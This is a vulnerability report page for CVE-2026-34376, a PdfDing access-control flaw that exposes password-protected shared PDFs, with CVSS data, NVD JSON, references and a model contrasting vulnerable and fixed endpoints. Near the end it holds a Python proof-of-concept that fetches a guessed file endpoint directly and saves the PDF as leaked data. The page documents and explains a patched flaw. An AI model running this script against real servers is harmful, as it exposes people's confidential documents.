Security Vulnerability Report

CVE-2026-34376 CVSS 7.5 HIGH

Published: 2026-04-01 18:16:30
Last Modified: 2026-04-07 20:16:14

Description

PdfDing is a selfhosted PDF manager, viewer and editor offering a seamless user experience on multiple devices. Prior to version 1.7.0, an access-control vulnerability allows unauthenticated users to retrieve password-protected shared PDFs by directly calling the file-serving endpoint without completing the password verification flow. This results in unauthorized access to confidential documents that users expected to be protected by a shared-link password. This issue has been patched in version 1.7.0.
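The root cause described above is an authorization check that lives only on the password page, so the file-serving endpoint hands out the document to anyone who requests it directly. The following added example is not PdfDing's code and uses no PdfDing identifiers; it is a framework-free model of the share flow with hypothetical names (SharedPdf, Session, verify_share_password, serve_file_vulnerable, serve_file_fixed) that puts the vulnerable file endpoint beside the fixed one. The fixed endpoint re-checks, on every request, that this visitor's session has unlocked this specific share, and unlocking one share must not unlock another.

```python
import hmac
import hashlib
import secrets
from dataclasses import dataclass, field

# Constructed model of a password-protected shared PDF. These names are
# illustrative, not PdfDing's own types or views.
@dataclass
class SharedPdf:
    share_id: str
    password_hash: bytes   # salted PBKDF2 hash of the share password
    salt: bytes
    content: bytes         # the PDF bytes the share password is meant to protect

@dataclass
class Session:
    """Server-side session; records which share ids the visitor has unlocked."""
    unlocked_shares: set[str] = field(default_factory=set)

PBKDF2_ROUNDS = 100_000

def make_share(share_id: str, password: str, content: bytes) -> SharedPdf:
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return SharedPdf(share_id, digest, salt, content)

def verify_share_password(share: SharedPdf, session: Session, password: str) -> bool:
    """The password step of the share flow. On success the share id is recorded in
    the session; that record is the only thing the file endpoint may trust."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), share.salt, PBKDF2_ROUNDS)
    if hmac.compare_digest(candidate, share.password_hash):
        session.unlocked_shares.add(share.share_id)
        return True
    return False

def serve_file_vulnerable(share: SharedPdf, session: Session) -> tuple[int, bytes]:
    """Vulnerable pattern: the file endpoint assumes the caller came through the
    password page and never consults the session, so a direct request succeeds."""
    return 200, share.content

def serve_file_fixed(share: SharedPdf, session: Session) -> tuple[int, bytes]:
    """Fixed pattern: the file endpoint enforces the gate itself, per share id."""
    if share.share_id not in session.unlocked_shares:
        return 403, b""
    return 200, share.content

def demo() -> dict:
    """Walk an anonymous visitor through both endpoints; returns the observed statuses."""
    share = make_share("share-abc", "correct horse", b"%PDF-1.4 constructed sample A")
    other = make_share("share-xyz", "another secret", b"%PDF-1.4 constructed sample B")
    visitor = Session()  # visitor who skipped the password page entirely

    vulnerable_direct, _ = serve_file_vulnerable(share, visitor)
    fixed_direct, _ = serve_file_fixed(share, visitor)

    wrong_accepted = verify_share_password(share, visitor, "wrong")
    fixed_after_wrong, _ = serve_file_fixed(share, visitor)

    right_accepted = verify_share_password(share, visitor, "correct horse")
    fixed_after_right, body = serve_file_fixed(share, visitor)

    # Unlocking share-abc must not unlock share-xyz for the same session.
    fixed_other_share, _ = serve_file_fixed(other, visitor)

    return {
        "vulnerable_direct": vulnerable_direct,
        "fixed_direct": fixed_direct,
        "wrong_password_accepted": wrong_accepted,
        "fixed_after_wrong": fixed_after_wrong,
        "right_password_accepted": right_accepted,
        "fixed_after_right": fixed_after_right,
        "body_matches": body == share.content,
        "fixed_other_share": fixed_other_share,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The design point is that the unlock record is keyed by share id and checked at the point where bytes leave the server, not at the page that collects the password. A per-session flag such as "some share was unlocked" would reintroduce a narrower form of the same bypass.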

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:pdfding:pdfding:*:*:*:*:*:*:*:* - VULNERABLE
PdfDing < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_cve_2026_34376(target_url, file_uuid):
    """
    PoC for CVE-2026-34376.
    Demonstrates bypassing password protection to download a PDF.
    """
    # Directly access the file serving endpoint
    # bypassing the password verification flow.
    # Example endpoint structure based on typical implementations.
    url = f"{target_url}/api/files/{file_uuid}"
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
    }
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200 and 'application/pdf' in response.headers.get('Content-Type', ''):
            print("[+] Exploit successful! File downloaded.")
            with open(f"leaked_{file_uuid}.pdf", "wb") as f:
                f.write(response.content)
            return True
        else:
            print(f"[-] Failed to retrieve file. Status: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False


# Usage: exploit_cve_2026_34376("http://target-ip", "pdf-id-here")
```

References

https://github.com/mrmn2/PdfDing/commit/ae579ea98c5603d1435e0d90e81d72151564088a (Patch)
https://github.com/mrmn2/PdfDing/pull/294 (Issue Tracking, Patch)
https://github.com/mrmn2/PdfDing/releases/tag/v1.7.0 (Product, Release Notes)
https://github.com/mrmn2/PdfDing/security/advisories/GHSA-42x7-vvj4-4cj3 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34376",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T18:16:30.177",
    "lastModified": "2026-04-07T20:16:13.720",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PdfDing is a selfhosted PDF manager, viewer and editor offering a seamless user experience on multiple devices. Prior to version 1.7.0, an access-control vulnerability allows unauthenticated users to retrieve password-protected shared PDFs by directly calling the file-serving endpoint without completing the password verification flow. This results in unauthorized access to confidential documents that users expected to be protected by a shared-link password. This issue has been patched in version 1.7.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pdfding:pdfding:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.7.0",
                "matchCriteriaId": "2B5F1011-6A2F-4DB7-8192-662436A9918D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mrmn2/PdfDing/commit/ae579ea98c5603d1435e0d90e81d72151564088a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mrmn2/PdfDing/pull/294",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/mrmn2/PdfDing/releases/tag/v1.7.0",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/mrmn2/PdfDing/security/advisories/GHSA-42x7-vvj4-4cj3",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```